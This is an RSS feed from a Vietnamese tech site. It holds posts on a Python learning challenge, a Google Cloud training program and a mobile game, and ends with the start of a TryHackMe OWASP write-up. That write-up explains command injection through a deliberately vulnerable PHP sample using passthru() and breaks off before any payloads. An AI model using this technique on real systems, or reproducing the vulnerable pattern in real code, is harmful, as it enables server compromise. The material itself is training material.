<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>challenge &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/challenge/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Mon, 07 Aug 2023 00:34:17 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.2</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>challenge &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Complete the 30 day python learning challenge</title>
		<link>https://en.anonyviet.com/complete-the-30-day-python-learning-challenge/</link>
					<comments>https://en.anonyviet.com/complete-the-30-day-python-learning-challenge/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 07 Aug 2023 00:34:17 +0000</pubDate>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[challenge]]></category>
		<category><![CDATA[Complete]]></category>
		<category><![CDATA[Day]]></category>
		<category><![CDATA[learning]]></category>
		<category><![CDATA[Python]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=12892</guid>

					<description><![CDATA[So we have completed the 30 day Python learning challenge. For those of you who don&#8217;t know, this is my challenge for those who are new to programming, and want to learn about the Python programming language on anonyviet&#8217;s facebook group. Join the channel Telegram belong to AnonyViet ???? Link ???? About the 30 Day [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div>
<p>So we have completed the 30 day Python learning challenge.  For those of you who don&#8217;t know, this is my challenge for those who are new to programming, and want to learn about the Python programming language on <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.facebook.com%2Fgroups%2Fanonyviet" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">anonyviet&#8217;s facebook group</a>.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet </span> ???? <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  ????</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img fetchpriority="high" decoding="async" class="aligncenter wp-image-49540 size-full" src="https://anonyviet.com/wp-content/uploads/2023/07/anonyviet7.jpg" alt="Complete the 30 day python learning challenge" width="600" height="400" srcset="https://anonyviet.com/wp-content/uploads/2023/07/anonyviet7.jpg 600w, https://anonyviet.com/wp-content/uploads/2023/07/anonyviet7-300x200.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" title="Complete the 30 day challenge to learn python 6"/></p>
<h2>About the 30 Day Python Challenge</h2>
<p>Learning a new programming language can be a challenge for those new to programming, but it can also be a fun and rewarding experience.  In order to make it easy for you to learn and create an environment to learn with others, I have launched a series of 30 Days of Python Challenges inspired by the roadmap of Mr. Asabeneh, a great teacher and a great teacher. who mainly inspires himself.  In this challenge you will learn everything needed to be a python programmer and a whole bunch of other programming concepts.</p>
<p>The challenge is divided into 30 days, each day focusing on a different topic about Python.  Topics include:</p>
<ul>
<li>Introduction to Python</li>
<li>Python Syntax</li>
<li>Object Oriented Programming</li>
<li>Data structures</li>
<li>Algorithms</li>
<li>Data Science</li>
<li>Web Programming</li>
</ul>
<p>This challenge is designed for all levels, so you can join the challenge too <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fkien-thuc-python-co-ban-cho-nguoi-moi%2F" class="local-link" rel="noopener">don&#8217;t know anything about python</a> or you already have some experience working with python.</p>
<p>I also changed the learning method to each slide, helping you feel new and more interested in learning.  The route and lesson content has been well researched, from other people on github and I also checked the code so you can rest assured about this challenge.</p>
<p>At the end of each lesson, there will be exercises related to the content learned.  Exercises will be divided into different levels, from easy to difficult, these exercises will help you practice and apply the knowledge you have learned, as well as test your ability.  If you don&#8217;t know how to solve it, you can also comment under that lesson or ask others in the community.  So don&#8217;t be afraid to ask, studying with others will definitely be less boring than studying alone and those studying with you will also be a source of motivation to help you continue your self-study process.</p>
<p>Through this series, I see that people really like the way this content is delivered, as evidenced by the fact that every post has a high number of interactions and shares.  After this series of 30 Days of Python Challenge, I will need some time to put the whole process together, and plan a new series that is equally fascinating.  So you can go to anonyviet&#8217;s facebook group and look forward to the new challenge.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;49539&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 0\/5 - (0 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;Ho\u00e0n th\u00e0nh th\u1eed th\u00e1ch 30 ng\u00e0y h\u1ecdc python&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            <span class="kksr-muted">Rate this post</span>
    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/complete-the-30-day-python-learning-challenge/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2023/07/anonyviet7-1.png" medium="image"></media:content>
            	</item>
		<item>
		<title>How to join Google&#8217;s QuanQuanGCP season 5 challenge</title>
		<link>https://en.anonyviet.com/how-to-join-googles-quanquangcp-season-5-challenge/</link>
					<comments>https://en.anonyviet.com/how-to-join-googles-quanquangcp-season-5-challenge/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 11 Apr 2023 01:02:36 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[challenge]]></category>
		<category><![CDATA[Googles]]></category>
		<category><![CDATA[Join]]></category>
		<category><![CDATA[QuanQuanGCP]]></category>
		<category><![CDATA[season]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=12082</guid>

					<description><![CDATA[QuanQuanGCP is Google&#8217;s free online learning program to provide programmers and students in Vietnam with the opportunity to access the Google Cloud platform and participate in free practical Google Labs. Google will sponsor all of the above resources Google Cloud and CloudSkillBoost to encourage and provide a full learning environment for you. Moreover, you can [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>QuanQuanGCP is Google&#8217;s free online learning program to provide programmers and students in Vietnam with the opportunity to access the Google Cloud platform and participate in free practical Google Labs.  Google will sponsor all of the above resources <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Ftao-vps-bang-google-cloud-mien-phi-2021%2F" class="local-link" rel="noopener">Google Cloud</a> and CloudSkillBoost to encourage and provide a full learning environment for you.  Moreover, you can also join the community and interact with vibrant programmers with the same goals.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet </span> ???? <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  ????</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="12082" fifu-featured="1" decoding="async" class="aligncenter wp-image-46285 size-full" src="https://anonyviet.com/wp-content/uploads/2023/04/anonyviet4-1.jpg" alt="How to join Google&#8217;s QuanQuanGCP season 5 challenge" title="How to join Google&#8217;s QuanQuanGCP season 5 challenge"s QuanQuanGCP season 5 challenge" width="675" height="450" srcset="https://anonyviet.com/wp-content/uploads/2023/04/anonyviet4-1.jpg 675w, https://anonyviet.com/wp-content/uploads/2023/04/anonyviet4-1-300x200.jpg 300w" sizes="(max-width: 675px) 100vw, 675px" title="How to participate in Google's QuanQuanGCP season 5 challenge 10"/></p>
<h2 id="ftoc-quanquangcp-mua-5-co-gi" class="ftwp-heading">What does QuanQuanGCP season 5 have?</h2>
<p>Through 4 seasons of QuanQuanGCP with many different themes, each season has new themes.  In this season 5, the topic that you will learn is about:</p>
<ol>
<li>App Modernization &#038; Security</li>
<li>Data Analytics &#038; AI/ML</li>
</ol>
<p>You will be given 1 month of free access to Google Cloud Skills (Qwiklabs).  To complete this challenge and receive attractive gifts from the organizers:</p>
<ul>
<li><strong>Complete at least 7 quests, minimum 3 Skills Badges: </strong>Bags, mouse pads</li>
<li><strong>Complete at least 14 quests, minimum 6 Skill Badges: </strong>Shirts, Bags, Mouse Pads</li>
</ul>
<p>Here is a list of Quests that you can learn for free.  Note that these are Quests and Badges that are counted as valid by the program.  Your participation in Quests and Badges other than the list below will not be counted.</p>
<p><strong>1.App Modernization &#038; Security:</strong></p>
<ul>
<li><strong>Skill Badges:</strong>
</li>
<li><strong>Regular Badge</strong>
</li>
</ul>
<p><strong>2. Data Analytics &#038; AI/ML</strong></p>
<ul>
<li><strong>Skill Badges:</strong>
</li>
<li><strong>Regular Badges</strong>
</li>
</ul>
<p>In addition, you can also follow the routes available in CloudSkillBoost such as Security Engineer, etc.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46290 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-34.jpg" alt="How to join the Google 8 QuanQuanGCP season 5 challenge" width="885" height="683" srcset="https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-34.jpg 885w, https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-34-300x232.jpg 300w, https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-34-768x593.jpg 768w, https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-34-750x579.jpg 750w" sizes="auto, (max-width: 885px) 100vw, 885px" title="How to join the Google 11's QuanQuanGCP season 5 challenge"/></p>
<h2 id="ftoc-cach-dang-ky-quanquangcp-mua-5" class="ftwp-heading">How to register for QuanQuanGCP season 5</h2>
<p><strong>Step 1:</strong> First, you access the registration form <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fdocs.google.com%2Fforms%2Fd%2Fe%2F1FAIpQLSe9kHLf474f0hdGuJQkeDKnQrEsWVzvME9RsYR5gyYJyUaFew%2Fviewform%3Fpli%3D1" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here</a>.</p>
<p><strong>Step 2:</strong> Fill in the required information and submit the form.</p>
<p><strong>Step 3:</strong> Wait about 1 day, you will receive an email response.  You access Quest 1 in that email.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46287 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-32.jpg" alt="How to participate in Google 9's QuanQuanGCP season 5 challenge" width="481" height="140" srcset="https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-32.jpg 481w, https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-32-300x87.jpg 300w" sizes="auto, (max-width: 481px) 100vw, 481px" title="How to participate in Google's QuanQuanGCP season 5 challenge 12"/></p>
<p><strong>Step 4:</strong> Complete 1 labs.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46288 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-33.jpg" alt="How to join Google's QuanQuanGCP season 5 challenge 10" width="715" height="328" srcset="https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-33.jpg 715w, https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-33-300x138.jpg 300w" sizes="auto, (max-width: 715px) 100vw, 715px" title="How to join Google's QuanQuanGCP season 5 challenge 13"/></p>
<p><strong>Step 5:</strong> If the account is currently <strong>“Monthly Subscription”</strong> then be successful.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-46289 aligncenter" src="https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-33_1.jpg" alt="How to join the Google 11's QuanQuanGCP season 5 challenge" width="235" height="334" srcset="https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-33_1.jpg 235w, https://anonyviet.com/wp-content/uploads/2023/04/2023-04-10_21-33_1-211x300.jpg 211w" sizes="auto, (max-width: 235px) 100vw, 235px" title="How to join Google's QuanQuanGCP season 5 challenge 14"/></p>
<p>Wish you all successfully conquer QuanQuanGCP season 5.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;46284&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 0\/5 - (0 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;C\u00e1ch tham gia th\u1eed th\u00e1ch QuanQuanGCP m\u00f9a 5 c\u1ee7a Google&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>
            <span class="kksr-muted">Rate this post</span>
    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-join-googles-quanquangcp-season-5-challenge/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2023/04/anonyviet4-1.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Download Game Challenge 14 billion &#8211; Extremely high coffee game</title>
		<link>https://en.anonyviet.com/download-game-challenge-14-billion-extremely-high-coffee-game/</link>
					<comments>https://en.anonyviet.com/download-game-challenge-14-billion-extremely-high-coffee-game/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Fri, 27 Jan 2023 10:43:53 +0000</pubDate>
				<category><![CDATA[Software]]></category>
		<category><![CDATA[billion]]></category>
		<category><![CDATA[challenge]]></category>
		<category><![CDATA[coffee]]></category>
		<category><![CDATA[Download]]></category>
		<category><![CDATA[extremely]]></category>
		<category><![CDATA[Game]]></category>
		<category><![CDATA[high]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=4809</guid>

					<description><![CDATA[The 14 billion challenge game can be said to be the most popular coffee game in Vietnam ever. If you haven&#8217;t forgotten the case of Ms. Hang (Dai Nam) revealing that a comedian kept 14 billion charity money but refused to donate to the people in the Central region, this game is mainly about that [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>The 14 billion challenge game can be said to be the most popular coffee game in Vietnam ever.  If you haven&#8217;t forgotten the case of Ms. Hang (Dai Nam) revealing that a comedian kept 14 billion charity money but refused to donate to the people in the Central region, this game is mainly about that comedian.  In this article, I will show you how to download and play this 14 Billion Challenge game.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fcach-choi-game-thu-thach-14-ty.jpg" rel="noopener" class="local-link"><img post-id="4809" fifu-featured="1" decoding="async" class="aligncenter size-full wp-image-28351" src="https://anonyviet.com/wp-content/uploads/2021/07/cach-choi-game-thu-thach-14-ty.jpg" alt="Download Game Challenge 14 billion &#8211; Extremely high coffee game" title="Download Game Challenge 14 billion &#8211; Extremely high coffee game" width="684" height="367" srcset="https://anonyviet.com/wp-content/uploads/2021/07/cach-choi-game-thu-thach-14-ty.jpg 684w, https://anonyviet.com/wp-content/uploads/2021/07/cach-choi-game-thu-thach-14-ty-300x161.jpg 300w" sizes="(max-width: 684px) 100vw, 684px" title="Download Game Challenge 14 billion - Extremely high coffee game 7"/></a></p>
<h2 id="ftoc-cot-truyen-game-thu-thach-14-ty" class="ftwp-heading">Story Challenge Game 14 billion</h2>
<p>According to the content of the Game, after Downloading Challenge 14 billion, players will transform into a kind and humorous clown to collect money and raise money to help people in Central Vietnam in difficulty.  When playing the character of a clown, you will use<strong> 4 emulator buttons</strong> to <strong>joystick </strong>to move the character left, right up, down and pick up the piles of money, money scattered everywhere.</p>
<p>The game is designed in 2D with quite simple operation with typical gameplay and easy to get used to.  However, the gameplay is extremely difficult to chew, because after each time you eat more money, a new black shadow will appear and mimic the actions of the main character.  If you touch the black ball the game will end.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Ftai-game-thu-thach-14-ty-dien-thoai.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-28353" src="https://anonyviet.com/wp-content/uploads/2021/07/tai-game-thu-thach-14-ty-dien-thoai.jpg" alt="The game earns 14 phone bills" width="523" height="291" srcset="https://anonyviet.com/wp-content/uploads/2021/07/tai-game-thu-thach-14-ty-dien-thoai.jpg 523w, https://anonyviet.com/wp-content/uploads/2021/07/tai-game-thu-thach-14-ty-dien-thoai-300x167.jpg 300w" sizes="auto, (max-width: 523px) 100vw, 523px" title="Download Game Challenge 14 billion - Extremely high coffee game 8"/></a></p>
<p>When the amount is high, one <strong>&#8220;ghost of conscience&#8221;</strong> very similar to the main character (comedian) appearing and participating in the chase.  The ultimate goal of this game is to raise the full amount of 14 billion.  The special thing is that the character ghost of conscience in the Game is designed quite like comedian Hoai Linh.  Therefore many players do not know what the author means?  Have you tried playing this game yet?</p>
<h2 id="ftoc-download-game-thu-thach-14-ty" class="ftwp-heading">Download Game Challenge 14 billion</h2>
<p>After launching on June 24, 2021, Challenge 14 Billion has over 1000 downloads and is rated 4.7*.</p>
<p>The current <strong><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Dcom.fourteenbillions.android" rel="noopener" class="local-link">Download Game Challenge 14 billion</a> </strong>Only support download on Google Play Store of Android operating system.  You can download it directly on your Android phone to play.  Hopefully in the near future the author will develop more on iOS, the majority of iPhone users want to download Game Challenge 14 billion but not yet on the Appstore.</p>
<p>If you use Windows, you can install the <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F%3Fs%3Dgi%25E1%25BA%25A3%2Bl%25E1%25BA%25ADp%2Bandroid" rel="noopener" class="local-link">Android emulator software</a>afterward<strong> Download Challenge 14 billion</strong> to play on the computer.</p>
<p>It can be said that this is a highly entertaining and humorous game.  You should play with friends or family to see who can pick up more coins.  Remember not to let the ghost of conscience haunt you but &#8220;soak 14 billion and wait for a reminder to release&#8221;.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;28350&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/download-game-challenge-14-billion-extremely-high-coffee-game/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/07/cach-choi-game-thu-thach-14-ty.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>TryHackMe: OWASP Top 10 Challenge Part 1</title>
		<link>https://en.anonyviet.com/tryhackme-owasp-top-10-challenge-part-1/</link>
					<comments>https://en.anonyviet.com/tryhackme-owasp-top-10-challenge-part-1/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 25 Jan 2023 18:39:47 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[challenge]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Part]]></category>
		<category><![CDATA[Top]]></category>
		<category><![CDATA[Tryhackme]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=3211</guid>

					<description><![CDATA[In this article, we will explore the challenge OWASP Top 10 above TryHackMe. Through this challenge, you can also learn and exploit each of the top 10 OWASP vulnerabilities. Those are the 10 most important web security risks, read this paragraph to understand more. Join the channel Telegram of the AnonyViet 👉 Link 👈 Because [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>In this article, we will explore the challenge <a target="_blank" class="dy ix ext-link" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Ftryhackme.com%2Froom%2Fowasptop10" rel="noopener ugc nofollow external" onclick="this.target='_blank';">OWASP Top 10</a> above <a target="_blank" class="dy ix ext-link" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Ftryhackme.com%2F" rel="noopener ugc nofollow external" onclick="this.target='_blank';">TryHackMe.</a> Through this challenge, you can also learn and exploit each of the top 10 OWASP vulnerabilities.  Those are the 10 most important web security risks, read <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Ftop-10-lo-hong-bao-mat-web-theo-cong-bo-owasp-2020%2F" rel="noopener" class="local-link">this paragraph</a> to understand more.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="3211" fifu-featured="1" decoding="async" class="aligncenter wp-image-34548 size-full" src="https://anonyviet.com/wp-content/uploads/2021/10/0_2NSPrwCU5nN8bQHP.jpg" alt="TryHackMe: OWASP Top 10 Challenge Part 1" title="TryHackMe: OWASP Top 10 Challenge Part 1" width="525" height="317" srcset="https://anonyviet.com/wp-content/uploads/2021/10/0_2NSPrwCU5nN8bQHP.jpg 525w, https://anonyviet.com/wp-content/uploads/2021/10/0_2NSPrwCU5nN8bQHP-300x181.jpg 300w" sizes="(max-width: 525px) 100vw, 525px" title="TryHackMe: OWASP Top 10 Challenge Part 1 27"/></p>
<p>Because this challenge is a bit too much, I will divide it into 3 parts for you to follow and also read to be less boring.</p>
<p>I will go straight to the practical part and skip the technical knowledge.  If you want to learn the knowledge or how the vulnerability works, you can go to the room to read it.  And note, the websites I visit in this article are Tryhackme&#8217;s virtual servers.</p>
<h2 id="ftoc-tryhackme-thu-thach-owasp-top-10-phan-1" class="ftwp-heading">TryHackMe: OWASP Top 10 Challenge Part 1</h2>
<h3 id="ftoc-nhiem-vu-5-muc-do-nghiem-trong-1-command-injection" class="ftwp-heading">Mission 5: [Mức độ nghiêm trọng 1] <strong class="ib da"> Command Injection</strong></h3>
<h4 id="ftoc-active-command-injection-la-gi" class="ftwp-heading"><strong> What is Active Command Injection?</strong></h4>
<p>Blind command injection (Bli<span id="rmm">n</span>d command injection) occurs when a system command executed to the server does not return a response to the user in the HTML document.  And ACI (Active command injection) will return the response to the user.  It can be displayed through a number of HTML elements.</p>
<p>See the following script: EvilCorp started developing on the web platform but was accidentally exposed to the Internet.  It&#8217;s incomplete but still contains a command injection vulnerability.  But this time, the response from the system call can be seen on the web page.</p>
<p>Read the sample code from evilhell.php and see what it&#8217;s doing and why it&#8217;s getting ACI.  I will leave the sample code below.</p>
<p><strong class="ib da">EvilShell (evilshell.php)</strong></p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-34550 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/10/1_HKrEjcxvxXttCYTEcFnkhg.png" alt="TryHackMe: OWASP Top 10 Challenge Part 1 23" width="370" height="219" srcset="https://anonyviet.com/wp-content/uploads/2021/10/1_HKrEjcxvxXttCYTEcFnkhg.png 370w, https://anonyviet.com/wp-content/uploads/2021/10/1_HKrEjcxvxXttCYTEcFnkhg-300x178.png 300w" sizes="auto, (max-width: 370px) 100vw, 370px" title="TryHackMe: OWASP Top 10 Challenge Part 1 28"/></p>
<p>Program analysis:</p>
<ol>
<li>Check if the parameter<strong> “commandString”</strong> has been declared.</li>
<li>If so, then the variable <strong>$command_string</strong> get what was passed into the input field.</li>
<li>The program then enters a try block to execute the function <strong class="ib da">passthru($command_string)</strong>.  You can read the documentation for the passthru() function on the PHP website, but in general it will execute what is entered in the input field, then pass the output directly back to the browser.</li>
<li>If it fails, it will give an error.  In general, it won&#8217;t output anything because you can&#8217;t output it <a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fcentos-vn.blogspot.com%2F2013%2F12%2Fstdinstdoutstderr.html%23%3A%7E%3Atext%3DSTDERR%2520l%25C3%25A0%2520d%25C3%25B2ng%2520xu%25E1%25BA%25A5t%2520l%25E1%25BB%2597i%2Cth%25E1%25BB%2591ng%2520s%25E1%25BA%25BD%2520t%25E1%25BB%25B1%2520t%25E1%25BA%25A1o%2520ra%29." rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">stderr.</a></li>
</ol>
<p><strong>Ways to detect Active Command Injection</strong></p>
<p>ACI occurs when you can see a response from a system call.  In the above code, the function <strong class="ib da">passthru()</strong> direct feedback to the document so you can see it.  This command will help you easily view and analyze system errors.</p>
<p><strong>Commands to try</strong></p>
<p id="6bbe" class="hz ia fv ib b ic id ie if ig ih ii ij ik il im in io ip iq ir is it iu iv iw dn gr" data-selectable-paragraph=""><strong class="ib da">Linux</strong></p>
<ul class="">
